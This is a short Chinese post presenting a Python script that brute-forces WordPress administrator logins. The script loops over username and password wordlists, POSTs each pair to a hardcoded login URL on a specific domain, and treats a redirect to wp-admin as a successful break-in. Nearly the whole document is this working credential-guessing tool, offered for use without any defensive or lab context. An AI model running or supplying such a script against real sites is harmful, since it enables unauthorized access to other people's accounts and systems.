密码破解

l利用python做一个破解 WordPress 管理员账户的密码的脚本，代码使用了一个循环，将字典中的每个用户名和密码组合作为POST请求参数发送到指定的登录页面。如果页面跳转到了wp-admin后台页面，那么说明该组合是有效的，即该用户名和密码是正确的

1. import urllib3
   
2. import urllib.parse
   
3. 
   
4. http = urllib3.PoolManager(headers={'Content-Type': 'application/x-www-form-urlencoded'})
   
5. 
   
6. url = "http://www.ikunct1.top/admin/login.php"
   
7. 
   
8. users = []      # 初始化存储用户名的列表
   
9. passwords = []  # 初始化存储密码的列表
   
10. 
    
11. # 从文件中读取所有用户名和密码
    
12. with open('用户字典', 'r') as userlist:
    
13.     users = userlist.readlines()
    
14. with open('密码字典', 'r') as passwordlist:
    
15.     passwords = passwordlist.readlines()
    
16. 
    
17. # 循环处理用户名和密码组合
    
18. for user in users:
    
19.     user = user.strip()
    
20.     for password in passwords:
    
21.         password = password.strip()
    
22. 
    
23.         values = {'log': user, 'pwd': password}
    
24. 
    
25.         # 输出正在尝试的用户名和密码组合
    
26.         print(f"Trying user={user}, password={password}")
    
27. 
    
28.         encoded_values = urllib.parse.urlencode(values).encode('utf-8')
    
29.         response = http.request('POST', url, body=encoded_values)
    
30. 
    
31.         try:
    
32.             idx = response.geturl().index('wp-admin')
    
33.         except ValueError:
    
34.             idx = -1
    
35. 
    
36.         # 输出是否找到正确的用户名和密码
    
37.         if (idx >= 0):
    
38.             print(f"Found username: {user}, password: {password}")
    
39.             break
    
40.         else:
    
41.             print(f"Failed username: {user}, password: {password}")
    
42. 
    
43.     if (idx >= 0):
    
44.         break

复制代码